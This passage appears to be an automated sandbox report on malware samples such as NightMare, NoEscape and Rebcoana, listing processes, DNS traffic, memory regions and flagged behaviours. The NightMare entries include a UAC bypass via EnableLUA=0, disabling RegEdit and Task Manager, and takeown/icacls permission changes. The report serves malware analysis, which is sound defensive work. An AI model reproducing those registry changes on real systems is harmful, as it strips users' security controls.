| PID 2916 wrote to memory of 796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2916 wrote to memory of 796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2916 wrote to memory of 796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$1\1337\php5ts.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$1\1337\php5ts.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.109.69.13.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240215-en
Max time kernel
150s
Max time network
123s
Command Line
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Hydromatic (1).exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Hydromatic (1).exe"
Network
Files
memory/2892-0-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-1-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-2-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-3-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-4-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-5-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-6-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-7-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-8-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-9-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-10-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-11-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-12-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-13-0x0000000000E40000-0x0000000000E72000-memory.dmp
memory/2892-14-0x0000000000E40000-0x0000000000E72000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
93s
Max time network
127s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\REGFuck.bat"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
150s
Max time network
125s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Saturn.exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Saturn.exe"
Network
Files
memory/2344-0-0x0000000000E20000-0x0000000000E66000-memory.dmp
memory/2344-1-0x0000000074A30000-0x000000007511E000-memory.dmp
memory/2344-2-0x0000000004CB0000-0x0000000004CF0000-memory.dmp
memory/2344-3-0x0000000004CB0000-0x0000000004CF0000-memory.dmp
memory/2344-4-0x0000000074A30000-0x000000007511E000-memory.dmp
memory/2344-5-0x0000000004CB0000-0x0000000004CF0000-memory.dmp
memory/2344-6-0x0000000004CB0000-0x0000000004CF0000-memory.dmp
memory/2344-7-0x0000000004CB0000-0x0000000004CF0000-memory.dmp
memory/2344-8-0x0000000004CB0000-0x0000000004CF0000-memory.dmp
memory/2344-9-0x0000000005E70000-0x0000000005F70000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:15
Platform
win10v2004-20240226-en
Max time kernel
0s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide.exe
"C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | udp | |
| N/A | 20.190.159.0:443 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
141s
Max time network
121s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Users\Admin\AppData\Local\Temp\$1\1337\Frog.exe
"C:\Users\Admin\AppData\Local\Temp\$1\1337\Frog.exe"
Network
Files
memory/2400-0-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2400-3-0x0000000002360000-0x0000000002361000-memory.dmp
memory/2400-4-0x0000000000400000-0x000000000064F000-memory.dmp
memory/2400-5-0x0000000000400000-0x000000000064F000-memory.dmp
memory/2400-6-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2400-7-0x0000000002360000-0x0000000002361000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
117s
Max time network
121s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe"
Network
Files
memory/2196-0-0x0000000000400000-0x00000000005CC000-memory.dmp
memory/2196-1-0x0000000000400000-0x00000000005CC000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
147s
Max time network
156s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe
"C:\Users\Admin\AppData\Local\Temp\Rebcoana.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
Files
memory/3044-0-0x0000000000400000-0x0000000000584000-memory.dmp
memory/3044-1-0x0000000000400000-0x0000000000584000-memory.dmp
memory/3044-2-0x0000000000400000-0x0000000000584000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240215-en
Max time kernel
139s
Max time network
121s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9366).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1412).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2080).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4435).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6408).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4337).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4903).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5192).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6403).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(229).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6743).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8924).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7212).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7848).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9686).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3200).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5295).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5889).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6609).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2209).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2288).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6706).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5115).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5127).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8926).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9651).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(210).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(793).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4218).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4638).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5013).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7773).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7409).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7874).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8553).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1286).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5161).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6942).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7367).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9285).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1024).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3587).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4309).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7531).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3778).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3880).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6548).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7668).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(934).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1487).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
